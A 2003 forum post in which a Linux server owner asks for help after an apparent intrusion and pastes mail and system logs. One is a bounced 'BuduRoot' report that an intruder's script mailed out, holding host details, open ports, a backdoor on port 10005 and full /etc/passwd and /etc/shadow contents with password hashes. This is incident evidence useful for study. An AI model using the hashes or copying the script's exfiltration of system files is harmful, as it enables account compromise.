This is a discussion on "My server box is hacked! help..." within the Linux Security forums, part of the System Security and Security Related category.
I think my server box is hacked!!
Help me!.. These are my log files.

This is my maillog:

Jun 27 02:32:02 localhost sendmail[818]: alias database /etc/aliases rebuilt by root
Jun 27 02:32:02 localhost sendmail[818]: /etc/aliases: 40 aliases, longest 10 bytes, 395 bytes total
Jun 27 02:32:03 localhost sendmail[830]: starting daemon (8.11.3): SMTP+queueing@01:00:00
Jun 27 02:37:42 localhost sendmail[1422]: h5QHbgU01422: from=root, size=241, class=0, nrcpts=1, msgid=<200306261737.h5QHbgU01422@localhost.localdomain>, relay=root@localhost
Jun 27 02:37:42 localhost sendmail[1422]: h5QHbgU01422: to=root, ctladdr=root (0/0), delay=00:00:00, xdelay=00:00:00, mailer=local, pri=30241, dsn=2.0.0, stat=Sent
Jun 27 02:49:22 localhost sendmail[901]: alias database /etc/aliases rebuilt by root
Jun 27 02:49:22 localhost sendmail[901]: /etc/aliases: 40 aliases, longest 10 bytes, 395 bytes total
Jun 27 02:49:23 localhost sendmail[913]: starting daemon (8.11.3): SMTP+queueing@01:00:00
Jun 27 06:56:49 localhost sendmail[1658]: h5QLunI01658: from=root, size=11586, class=0, nrcpts=1, msgid=<200306262156.h5QLunI01658@localhost.localdomain>, relay=root@localhost
Jun 27 06:56:49 localhost sendmail[1661]: h5QLunc01661: from=root, size=11589, class=0, nrcpts=1, msgid=<200306262156.h5QLunc01661@localhost.localdomain>, relay=root@localhost
Jun 27 06:56:50 localhost sendmail[1666]: h5QLunl01666: from=root, size=11583, class=0, nrcpts=1, msgid=<200306262156.h5QLunl01666@localhost.localdomain>, relay=root@localhost
Jun 27 06:56:51 localhost sendmail[1708]: h5QLunl01666: to=solistu@yahoo.com, ctladdr=root (0/0), delay=00:00:02, xdelay=00:00:01, mailer=esmtp, pri=41583, relay=mx2.mail.yahoo.com. [64.156.215.5], dsn=2.0.0, stat=Sent (ok dirdel)
Jun 27 06:56:52 localhost sendmail[1705]: h5QLunc01661: to=secretzel@secretzel.org, ctladdr=root (0/0), delay=00:00:03, xdelay=00:00:02, mailer=esmtp, pri=41589, relay=mx2.bm.vip.sc5.yahoo.com. [66.163.171.159], dsn=2.0.0, stat=Sent (ok dirdel)
Jun 27 06:56:27 localhost sendmail[1585]: h5QLuR901585: from=root, size=2096, class=0, nrcpts=1, msgid=<200306262156.h5QLuR901585@localhost.localdomain>, relay=root@localhost
Jun 27 06:56:52 localhost sendmail[1706]: h5QLunI01658: to=mukles@mukles.org, ctladdr=root (0/0), delay=00:00:03, xdelay=00:00:02, mailer=esmtp, pri=41586, relay=mx2.bm.vip.sc5.yahoo.com. [66.163.171.159], dsn=5.0.0, stat=Service unavailable
Jun 27 06:56:52 localhost sendmail[1706]: h5QLunI01658: h5QLuqH01706: DSN: Service unavailable
Jun 27 06:56:52 localhost sendmail[1706]: h5QLuqH01706: to=root, delay=00:00:00, xdelay=00:00:00, mailer=local, pri=41686, dsn=2.0.0, stat=Sent

I have never sent emails to solistu@yahoo.com, secretzel@secretzel.org, or mukles@mukles.org... I guess that fricking hacker sent these... These are the emails that were returned. It was intended to be sent to mukles@mukles.org. It contains so much information about my box. :-(

From root Fri Jun 27 06:56:52 2003
Return-Path: <MAILER-DAEMON@localhost.localdomain>
Received: from localhost (localhost)
	by localhost.localdomain (8.11.3/8.11.3) id h5QLuqH01706;
	Fri, 27 Jun 2003 06:56:52 +0900
Date: Fri, 27 Jun 2003 06:56:52 +0900
From: Mail Delivery Subsystem <MAILER-DAEMON@localhost.localdomain>
Message-Id: <200306262156.h5QLuqH01706@localhost.localdomain>
To: root@localhost.localdomain
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
	boundary="h5QLuqH01706.1056664612/localhost.localdomain"
Subject: Returned mail: see transcript for details
Auto-Submitted: auto-generated (failure)
Status: RO

This is a MIME-encapsulated message

--h5QLuqH01706.1056664612/localhost.localdomain

The original message was received at Fri, 27 Jun 2003 06:56:49 +0900
from root@localhost

   ----- The following addresses had permanent fatal errors -----
mukles@mukles.org
    (reason: 554 delivery error: dd Sorry, your message to mukles@mukles.org cannot be delivered. This account is over quota. - mta101.bizmail.yahoo.com)

   ----- Transcript of session follows -----
.... while talking to mx2.bm.vip.sc5.yahoo.com.:
>>> DATA
<<< 554 delivery error: dd Sorry, your message to mukles@mukles.org cannot be delivered. This account is over quota. - mta101.bizmail.yahoo.com
554 5.0.0 mukles@mukles.org... Service unavailable

--h5QLuqH01706.1056664612/localhost.localdomain
Content-Type: message/delivery-status

Reporting-MTA: dns; localhost.localdomain
Arrival-Date: Fri, 27 Jun 2003 06:56:49 +0900

Final-Recipient: RFC822; mukles@mukles.org
Action: failed
Status: 5.0.0
Remote-MTA: DNS; mx2.bm.vip.sc5.yahoo.com
Diagnostic-Code: SMTP; 554 delivery error: dd Sorry, your message to mukles@mukles.org cannot be delivered. This account is over quota. - mta101.bizmail.yahoo.com
Last-Attempt-Date: Fri, 27 Jun 2003 06:56:52 +0900

--h5QLuqH01706.1056664612/localhost.localdomain
Content-Type: message/rfc822

Return-Path: <root>
Received: (from root@localhost)
	by localhost.localdomain (8.11.3/8.11.3) id h5QLunI01658
	for mukles@mukles.org; Fri, 27 Jun 2003 06:56:49 +0900
Date: Fri, 27 Jun 2003 06:56:49 +0900
From: root <root>
Message-Id: <200306262156.h5QLunI01658@localhost.localdomain>
To: mukles@mukles.org
Subject: BuduRoot

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++ Informatziile pe care le-ai dorit boss:) +++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Hostname : localhost.localdomain (218.236.54.89)
Alternative IP : 127.0.0.1
Host : localhost.localdomain
===============================================================
===============================================================
Yahoo.com ping:
PING 216.115.108.243 (216.115.108.243) from 218.236.54.89 : 56(84) bytes of data.
>From 204.157.5.110: Destination Net Unreachable
>From 204.157.5.110: Destination Net Unreachable
>From 204.157.5.110: Destination Net Unreachable
>From 204.157.5.110: Destination Net Unreachable
>From 204.157.5.110: Destination Net Unreachable
>From 204.157.5.110: Destination Net Unreachable

--- 216.115.108.243 ping statistics ---
6 packets transmitted, 0 packets received, +6 errors, 100% packet loss
===============================================================
Hw info:
CPU Speed: 167.048MHz
CPU Vendor: vendor_id : CyrixInstead
CPU Model: model name : 6x86MX 2.5x Core/Bus Clock
RAM: 189 Mb
===============================================================
HDD(s):
Filesystem Type Size Used Avail Use% Mounted on
/dev/hda2 ext2 1.4G 379M 960M 29% /
===============================================================
inetd-ul...
===============================================================
configurarea ip-urilor..
inet addr:218.236.54.89 Bcast:218.236.54.127 Mask:255.255.255.128
inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0
inet addr:127.0.0.1 Mask:255.0.0.0
===============================================================
Ports open:
rpc.statd 558 root 6u IPv4 938 TCP *:32768 (LISTEN)
sshd 732 root 3u IPv4 1115 TCP *:ssh (LISTEN)
proftpd 855 root 0u IPv4 1711 TCP *:ftp (LISTEN)
mysqld 922 root 3u IPv4 1859 TCP *:mysql (LISTEN)
mysqld 924 root 3u IPv4 1859 TCP *:mysql (LISTEN)
mysqld 925 root 3u IPv4 1859 TCP *:mysql (LISTEN)
mysqld 926 root 3u IPv4 1859 TCP *:mysql (LISTEN)
httpd 941 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 941 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 944 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 944 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 945 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 945 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 946 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 946 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 947 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 947 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 948 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 948 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 949 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 949 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 950 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 950 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 951 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 951 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 1387 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 1387 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 1388 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 1388 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 1389 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 1389 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 1390 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 1390 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 1391 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 1391 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 1392 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 1392 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 1393 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 1393 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 1394 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 1394 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 1395 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 1395 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 1396 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 1396 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 1397 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 1397 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 1398 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 1398 root 17u IPv4 1888 TCP *:http (LISTEN)
httpd 1399 root 16u IPv4 1887 TCP *:https (LISTEN)
httpd 1399 root 17u IPv4 1888 TCP *:http (LISTEN)
sh 1466 apache 16u IPv4 1887 TCP *:https (LISTEN)
sh 1466 apache 17u IPv4 1888 TCP *:http (LISTEN)
ptrace 1481 apache 16u IPv4 1887 TCP *:https (LISTEN)
ptrace 1481 apache 17u IPv4 1888 TCP *:http (LISTEN)
sh 1484 root 16u IPv4 1887 TCP *:https (LISTEN)
sh 1484 root 17u IPv4 1888 TCP *:http (LISTEN)
install 1492 root 16u IPv4 1887 TCP *:https (LISTEN)
install 1492 root 17u IPv4 1888 TCP *:http (LISTEN)
minilogd 1528 root 16u IPv4 1887 TCP *:https (LISTEN)
minilogd 1528 root 17u IPv4 1888 TCP *:http (LISTEN)
ava 1551 root 16u IPv4 1887 TCP *:https (LISTEN)
ava 1551 root 17u IPv4 1888 TCP *:http (LISTEN)
smbd 1562 root 10u IPv4 5130 TCP *:10005 (LISTEN)
smbd 1562 root 16u IPv4 1887 TCP *:https (LISTEN)
smbd 1562 root 17u IPv4 1888 TCP *:http (LISTEN)
sysinfo 1573 root 16u IPv4 1887 TCP *:https (LISTEN)
sysinfo 1573 root 17u IPv4 1888 TCP *:http (LISTEN)
lsof 1638 root 16u IPv4 1887 TCP *:https (LISTEN)
lsof 1638 root 17u IPv4 1888 TCP *:http (LISTEN)
grep 1639 root 16u IPv4 1887 TCP *:https (LISTEN)
grep 1639 root 17u IPv4 1888 TCP *:http (LISTEN)
===============================================================
/etc/passwd & /etc/shadow
/etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
nscd:x:28:28:NSCD Daemon:/:/bin/false
apache:x:48:48:Apache:/var/www:/bin/false
mailnull:x:47:47::/var/spool/mqueue:/dev/null
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
snort:x:100:101:Snort:/var/log/snort:/bin/false
ident:x:98:98:pident user:/:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
leemin:x:500:500::/home/leemin:/bin/bash
guest:x:501:501::/home/guest:/bin/bash
/etc/shadow
root:$1$RRV9SSBA$3xsSWK/dXjVL9BChuFvjh1:12230:0:99999:7:::
bin:*:12230:0:99999:7:::
daemon:*:12230:0:99999:7:::
adm:*:12230:0:99999:7:::
lp:*:12230:0:99999:7:::
sync:*:12230:0:99999:7:::
shutdown:*:12230:0:99999:7:::
halt:*:12230:0:99999:7:::
mail:*:12230:0:99999:7:::
news:*:12230:0:99999:7:::
uucp:*:12230:0:99999:7:::
operator:*:12230:0:99999:7:::
games:*:12230:0:99999:7:::
gopher:*:12230:0:99999:7:::
ftp:*:12230:0:99999:7:::
nobody:*:12230:0:99999:7:::
nscd:!!:12230:0:99999:7:::
apache:!!:12230:0:99999:7:::
mailnull:!!:12230:0:99999:7:::
mysql:!!:12230:0:99999:7:::
snort:!!:12230:0:99999:7:::
ident:!!:12230:0:99999:7:::
rpc:!!:12230:0:99999:7:::
rpcuser:!!:12230:0:99999:7:::
xfs:!!:12230:0:99999:7:::
leemin:$1$V7Ef3T5u$RMI38TLJVoUgWugTKDfsj/:12230:0:99999:7:::
guest:$1$dpKeoqUh$06k4I4BqjBUsLRhLjuXvr1:12229:0:99999:7:::
===============================================================
interesting filez:
Mp3-urile
Avi-urile
Mpg-urile
===============================================================
Hacking Files..
/usr/share/man/man1/perlhack.1.gz
/usr/share/sendmail-cf/hack
/usr/share/sendmail-cf/hack/cssubdomain.m4
/usr/bin/msghack
/usr/lib/perl5/5.6.0/pod/perlhack.pod
Cam asta este tot-ul ... sper sa fie ceva de server-ul asta...:)

--h5QLuqH01706.1056664612/localhost.localdomain--

This is 'messages':

Jun 27 06:56:49 localhost syslogd 1.4-0: restart.
Jun 27 06:56:49 localhost 6월 27 06:56:49 syslog: syslogd startup succeeded
Jun 27 06:56:49 localhost kernel: klogd 1.4-0, log source = /proc/kmsg started.
Jun 27 06:56:49 localhost kernel: Inspecting /boot/System.map-2.4.2-2wl
Jun 27 06:56:50 localhost 6월 27 06:56:50 syslog: klogd startup succeeded
Jun 27 06:56:50 localhost smbd -D[1720]: error: bind: Address already in use
Jun 27 06:56:50 localhost smbd -D[1720]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 06:56:50 localhost 6월 27 06:56:50 portmap: portmap startup succeeded
Jun 27 06:56:51 localhost kernel: Loaded 14746 symbols from /boot/System.map-2.4.2-2wl.
Jun 27 06:56:51 localhost kernel: Symbols match kernel version 2.4.2.
Jun 27 06:56:51 localhost kernel: Loaded 106 symbols from 12 modules.
Jun 27 06:56:52 localhost 6월 27 06:56:24 syslog: syslogd shutdown succeeded
Jun 27 06:56:26 localhost smbd -D[1562]: log: Server listening on port 10005.
Jun 27 06:56:26 localhost smbd -D[1562]: log: Generating 768 bit RSA key.
Jun 27 06:56:26 localhost smbd -D[1570]: error: bind: Address already in use
Jun 27 06:56:26 localhost smbd -D[1570]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 06:56:28 localhost smbd -D[1562]: log: RSA key generation complete.
Jun 27 06:56:49 localhost smbd -D[1685]: error: bind: Address already in use
Jun 27 06:56:49 localhost smbd -D[1685]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 08:07:15 localhost smbd -D[1783]: error: bind: Address already in use
Jun 27 08:07:15 localhost smbd -D[1783]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 09:34:59 localhost proftpd[1798]: localhost.localdomain (220.73.24.200[220.73.24.200]) - FTP session opened.
Jun 27 09:34:59 localhost PAM_pwdb[1798]: (ftp) session opened for user guest by (uid=0)
Jun 27 09:35:12 localhost proftpd[1798]: localhost.localdomain (220.73.24.200[220.73.24.200]) - FTP session closed.
Jun 27 09:35:12 localhost PAM_pwdb[1798]: (ftp) session closed for user guest
Jun 27 09:52:15 localhost smbd -D[1848]: error: bind: Address already in use
Jun 27 09:52:15 localhost smbd -D[1848]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 10:46:43 localhost proftpd[1856]: localhost.localdomain (195.166.231.119[195.166.231.119]) - FTP session opened.
Jun 27 10:46:43 localhost proftpd[1856]: localhost.localdomain (195.166.231.119[195.166.231.119]) - FTP session closed.
Jun 27 11:37:15 localhost smbd -D[1906]: error: bind: Address already in use
Jun 27 11:37:15 localhost smbd -D[1906]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:15:08 localhost sshd(pam_unix)[1917]: session opened for user root by (uid=0)
Jun 27 13:16:18 localhost smbd -D[1970]: error: bind: Address already in use
Jun 27 13:16:18 localhost smbd -D[1970]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:16:19 localhost smbd -D[1988]: error: bind: Address already in use
Jun 27 13:16:19 localhost smbd -D[1988]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:16:19 localhost 6월 27 13:16:19 keytable: sh: /usr/bin/(swapd): 그런 파일이나 디렉토리가 없음
Jun 27 13:16:19 localhost 6월 27 13:16:19 rc: Stopping keytable: succeeded
Jun 27 13:16:19 localhost smbd -D[2008]: error: bind: Address already in use
Jun 27 13:16:19 localhost smbd -D[2008]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:16:19 localhost 6월 27 13:16:19 mysqld: Stopping MySQL: succeeded
Jun 27 13:16:20 localhost smbd -D[2045]: error: bind: Address already in use
Jun 27 13:16:20 localhost smbd -D[2045]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:16:22 localhost 6월 27 13:16:22 httpd: httpd shutdown succeeded
Jun 27 13:16:22 localhost smbd -D[2073]: error: bind: Address already in use
Jun 27 13:16:22 localhost smbd -D[2073]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:16:22 localhost smbd -D[2088]: error: bind: Address already in use
Jun 27 13:16:22 localhost smbd -D[2088]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:16:22 localhost proftpd[855]: localhost.localdomain - ProFTPD 1.2.1 standalone mode SHUTDOWN
Jun 27 13:16:22 localhost 6월 27 13:16:22 proftpd: proftpd shutdown succeeded
Jun 27 13:16:23 localhost sshd(pam_unix)[1917]: session closed for user root
Jun 27 13:16:23 localhost 6월 27 13:16:23 sshd: sshd -TERM succeeded
Jun 27 13:16:23 localhost smbd -D[2113]: error: bind: Address already in use
Jun 27 13:16:23 localhost smbd -D[2113]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:16:23 localhost smbd -D[2136]: error: bind: Address already in use
Jun 27 13:16:23 localhost smbd -D[2136]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:16:24 localhost 6월 27 13:16:24 autofs: automount -USR2 succeeded
Jun 27 13:16:27 localhost smbd -D[2165]: error: bind: Address already in use
Jun 27 13:16:27 localhost smbd -D[2165]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:16:27 localhost 6월 27 13:16:27 apmd: apmd shutdown succeeded
Jun 27 13:16:27 localhost smbd -D[2192]: error: bind: Address already in use
Jun 27 13:16:27 localhost smbd -D[2192]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:16:28 localhost smbd -D[2243]: error: bind: Address already in use
Jun 27 13:16:28 localhost smbd -D[2243]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:16:28 localhost 6월 27 13:16:28 dd: 1+0개의 레코드를 입력하였습니다
Jun 27 13:16:28 localhost 6월 27 13:16:28 dd: 1+0개의 레코드를 출력하였습니다
Jun 27 13:16:28 localhost 6월 27 13:16:28 random: Saving random seed: succeeded
Jun 27 13:16:29 localhost smbd -D[2270]: error: bind: Address already in use
Jun 27 13:16:29 localhost smbd -D[2270]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:16:29 localhost 6월 27 13:16:29 nfslock: rpc.statd shutdown succeeded
Jun 27 13:16:29 localhost smbd -D[2303]: error: bind: Address already in use
Jun 27 13:16:29 localhost smbd -D[2303]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:16:30 localhost 6월 27 13:16:30 portmap: portmap shutdown succeeded
Jun 27 13:16:30 localhost kernel: Kernel logging (proc) stopped.
Jun 27 13:16:30 localhost kernel: Kernel log daemon terminating.
Jun 27 13:16:30 localhost smbd -D[2329]: error: bind: Address already in use
Jun 27 13:16:30 localhost smbd -D[2329]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:16:31 localhost 6월 27 13:16:31 syslog: klogd shutdown succeeded
Jun 27 13:16:31 localhost exiting on signal 15
Jun 27 13:18:34 localhost syslogd 1.4-0: restart.
Jun 27 13:18:34 localhost 6월 27 13:18:34 syslog: syslogd startup succeeded
Jun 27 13:18:34 localhost kernel: klogd 1.4-0, log source = /proc/kmsg started.
Jun 27 13:18:34 localhost kernel: Inspecting /boot/System.map-2.4.2-2wl
Jun 27 13:18:34 localhost 6월 27 13:18:34 syslog: klogd startup succeeded
Jun 27 13:18:35 localhost smbd -D[600]: error: bind: Address already in use
Jun 27 13:18:35 localhost smbd -D[600]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:35 localhost 6월 27 13:18:35 portmap: portmap startup succeeded
Jun 27 13:18:35 localhost smbd -D[619]: error: bind: Address already in use
Jun 27 13:18:35 localhost smbd -D[619]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:36 localhost rpc.statd[628]: Version 0.3.1 Starting
Jun 27 13:18:36 localhost 6월 27 13:18:36 nfslock: rpc.statd startup succeeded
Jun 27 13:18:36 localhost kernel: Loaded 14746 symbols from /boot/System.map-2.4.2-2wl.
Jun 27 13:18:36 localhost kernel: Symbols match kernel version 2.4.2.
Jun 27 13:18:36 localhost kernel: Loaded 11 symbols from 2 modules.
Jun 27 13:18:36 localhost kernel: Linux version 2.4.2-2wl (root@jhkim.wowlinux.com) (gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-85)) #1 금 6월 8 05:21:58 KST 2001
Jun 27 13:18:36 localhost kernel: BIOS-provided physical RAM map:
Jun 27 13:18:36 localhost kernel: BIOS-e820: 000000000009fc00 @ 0000000000000000 (usable)
Jun 27 13:18:36 localhost kernel: BIOS-e820: 0000000000000400 @ 000000000009fc00 (reserved)
Jun 27 13:18:36 localhost kernel: BIOS-e820: 0000000000010000 @ 00000000000f0000 (reserved)
Jun 27 13:18:36 localhost kernel: BIOS-e820: 0000000000010000 @ 00000000ffff0000 (reserved)
Jun 27 13:18:36 localhost kernel: BIOS-e820: 000000000bf00000 @ 0000000000100000 (usable)
Jun 27 13:18:36 localhost kernel: On node 0 totalpages: 49152
Jun 27 13:18:36 localhost kernel: zone(0): 4096 pages.
Jun 27 13:18:36 localhost kernel: zone DMA has max 32 cached pages.
Jun 27 13:18:36 localhost kernel: zone(1): 45056 pages.
Jun 27 13:18:36 localhost kernel: zone Normal has max 352 cached pages.
Jun 27 13:18:36 localhost kernel: zone(2): 0 pages.
Jun 27 13:18:36 localhost kernel: zone HighMem has max 1 cached pages.
Jun 27 13:18:36 localhost kernel: Kernel command line: auto BOOT_IMAGE=linux ro root=302 BOOT_FILE=/boot/vmlinuz-2.4.2-2wl
Jun 27 13:18:36 localhost kernel: Initializing CPU#0
Jun 27 13:18:36 localhost kernel: Detected 167.047 MHz processor.
Jun 27 13:18:36 localhost kernel: Console: colour VGA+ 80x25
Jun 27 13:18:36 localhost kernel: Calibrating delay loop... 333.41 BogoMIPS
Jun 27 13:17:38 localhost rc.sysinit: Mounting proc filesystem: succeeded
Jun 27 13:18:36 localhost kernel: Memory: 190220k/196608k available (1567k kernel code, 6000k reserved, 94k data, 528k init, 0k highmem)
Jun 27 13:17:38 localhost sysctl: net.ipv4.ip_forward = 0
Jun 27 13:18:37 localhost 6월 27 13:18:36 keytable: Loading keymap:
Jun 27 13:18:36 localhost kernel: Checking if this processor honours the WP bit even in supervisor mode... Ok.
Jun 27 13:17:38 localhost sysctl: net.ipv4.conf.all.rp_filter = 1
Jun 27 13:18:36 localhost smbd -D[642]: error: bind: Address already in use
Jun 27 13:18:37 localhost 6월 27 13:18:36 keytable: sh: /usr/bin/(swapd): 그런 파일이나 디렉토리가 없음
Jun 27 13:18:36 localhost kernel: Dentry-cache hash table entries: 32768 (order: 6, 262144 bytes)
Jun 27 13:17:38 localhost sysctl: kernel.sysrq = 0
Jun 27 13:18:37 localhost smbd -D[642]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:37 localhost kernel: Buffer-cache hash table entries: 16384 (order: 4, 65536 bytes)
Jun 27 13:17:38 localhost rc.sysinit: Configuring kernel parameters: succeeded
Jun 27 13:18:37 localhost 6월 27 13:18:37 keytable:
Jun 27 13:18:37 localhost kernel: Page-cache hash table entries: 65536 (order: 7, 524288 bytes)
Jun 27 13:17:38 localhost date: 금 6월 27 13:17:36 KST 2003
Jun 27 13:18:38 localhost 6월 27 13:18:37 keytable:
Jun 27 13:18:37 localhost kernel: Inode-cache hash table entries: 16384 (order: 5, 131072 bytes)
Jun 27 13:17:38 localhost rc.sysinit: Setting clock (localtime): Fri Jun 27 13:17:36 KST 2003 succeeded
Jun 27 13:18:38 localhost 6월 27 13:18:37 rc: Starting keytable: succeeded
Jun 27 13:18:37 localhost kernel: VFS: Diskquotas version dquot_6.5.0 initialized
Jun 27 13:17:38 localhost rc.sysinit: Loading default keymap succeeded
Jun 27 13:18:37 localhost kernel: CPU: Before vendor init, caps: 0080a135 00000000 00000000, vendor = 1
Jun 27 13:17:38 localhost rc.sysinit: Setting default font (lat0-16): succeeded
Jun 27 13:18:37 localhost kernel: CPU: After vendor init, caps: 0080a135 00000000 00000000 00000004
Jun 27 13:17:38 localhost rc.sysinit: Activating swap partitions: succeeded
Jun 27 13:18:37 localhost kernel: CPU: After generic, caps: 0080a135 00000000 00000000 00000004
Jun 27 13:17:38 localhost rc.sysinit: Setting hostname localhost.localdomain: succeeded
Jun 27 13:18:37 localhost kernel: CPU: Common caps: 0080a135 00000000 00000000 00000004
Jun 27 13:17:38 localhost fsck: /: clean, 35049/183552 files, 102364/366904 blocks
Jun 27 13:18:38 localhost kernel: CPU: Cyrix 6x86MX 2.5x Core/Bus Clock stepping 04
Jun 27 13:17:38 localhost rc.sysinit: Checking root filesystem succeeded
Jun 27 13:18:38 localhost kernel: Checking 'hlt' instruction... OK.
Jun 27 13:17:38 localhost rc.sysinit: Remounting root filesystem in read-write mode: succeeded
Jun 27 13:18:38 localhost 6월 27 13:17:41 rc.sysinit: Finding module dependencies: succeeded
Jun 27 13:18:38 localhost kernel: POSIX conformance testing by UNIFIX
Jun 27 13:18:39 localhost 6월 27 13:17:41 rc.sysinit: Checking filesystems succeeded
Jun 27 13:18:38 localhost kernel: mtrr: v1.37 (20001109) Richard Gooch (rgooch@atnf.csiro.au)
Jun 27 13:18:38 localhost smbd -D[679]: error: bind: Address already in use
Jun 27 13:18:39 localhost 6월 27 13:17:41 rc.sysinit: Mounting local filesystems: succeeded
Jun 27 13:18:38 localhost kernel: mtrr: detected mtrr type: Cyrix ARR
Jun 27 13:18:39 localhost 6월 27 13:18:38 random: Initializing random number generator: succeeded
Jun 27 13:18:38 localhost smbd -D[679]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:39 localhost 6월 27 13:17:42 rc.sysinit: Turning on user and group quotas for local filesystems: succeeded
Jun 27 13:18:38 localhost kernel: PCI: PCI BIOS revision 2.10 entry at 0xfb0c0, last bus=0
Jun 27 13:18:39 localhost 6월 27 13:17:43 rc.sysinit: Enabling swap space: succeeded
Jun 27 13:18:38 localhost kernel: PCI: Using configuration type 1
Jun 27 13:17:46 localhost init: Entering runlevel: 3
Jun 27 13:18:39 localhost kernel: PCI: Probing PCI hardware
Jun 27 13:17:47 localhost smbd -D[195]: error: bind: Address already in use
Jun 27 13:18:39 localhost kernel: PCI: Using IRQ router PIIX [8086/7110] at 00:01.0
Jun 27 13:17:47 localhost smbd -D[195]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:39 localhost kernel: Limiting direct PCI/PCI transfers.
Jun 27 13:17:47 localhost smbd -D[211]: error: bind: Address already in use
Jun 27 13:18:39 localhost kernel: isapnp: Scanning for PnP cards...
Jun 27 13:17:47 localhost smbd -D[211]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:39 localhost kernel: isapnp: Card '3Com 3C509B EtherLink III'
Jun 27 13:18:39 localhost 6월 27 13:17:48 kudzu: Updating /etc/fstab succeeded
Jun 27 13:18:39 localhost kernel: isapnp: 1 Plug & Play card detected total
Jun 27 13:18:39 localhost 6월 27 13:18:00 kudzu: succeeded
Jun 27 13:18:39 localhost kernel: Linux NET4.0 for Linux 2.4
Jun 27 13:18:01 localhost smbd -D[240]: error: bind: Address already in use
